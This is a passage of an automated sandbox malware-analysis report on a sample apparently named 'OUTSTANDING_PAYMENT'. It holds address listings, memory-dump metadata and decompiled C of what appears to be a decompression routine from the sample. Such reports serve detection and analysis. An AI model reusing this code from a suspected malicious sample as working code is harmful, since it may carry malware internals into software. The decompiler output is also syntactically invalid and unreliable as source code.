                                                                                                                        0x004070b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070bf
                                                                                                                        0x004070bf
                                                                                                                        0x004070c1
                                                                                                                        0x004070c5
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
                                                                                                                        0x00407127
                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x00000000
                                                                                                                        0x00407137
                                                                                                                        0x00407122
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00407166
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407170
                                                                                                                        0x00407175
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df8
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x00407569
                                                                                                                        0x00000000
                                                                                                                        0x00407569
                                                                                                                        0x00406e02
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e20
                                                                                                                        0x00406e23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e29
                                                                                                                        0x00406e29
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e60
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e93
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e9c
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406ef9
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f24
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f29
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f35
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f75
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00406f9a
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00000000
                                                                                                                        0x00406f41
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fbd
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fe8
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fed
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073bb
                                                                                                                        0x004073bb
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x0040739b
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x0040749d
                                                                                                                        0x00407458
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x0040744d
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x0040749d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725b
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f44
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070cf
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x00407599
                                                                                                                        0x00000000
                                                                                                                        0x00407599
                                                                                                                        0x004070d9
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070df
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x00407390
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00000000
                                                                                                                        0x0040710d
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x004075c3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x00000000
                                                                                                                        0x004075fa
                                                                                                                        0x00407447
                                                                                                                        0x004074c7
                                                                                                                        0x00407490

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                        • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                                                        • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                        • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
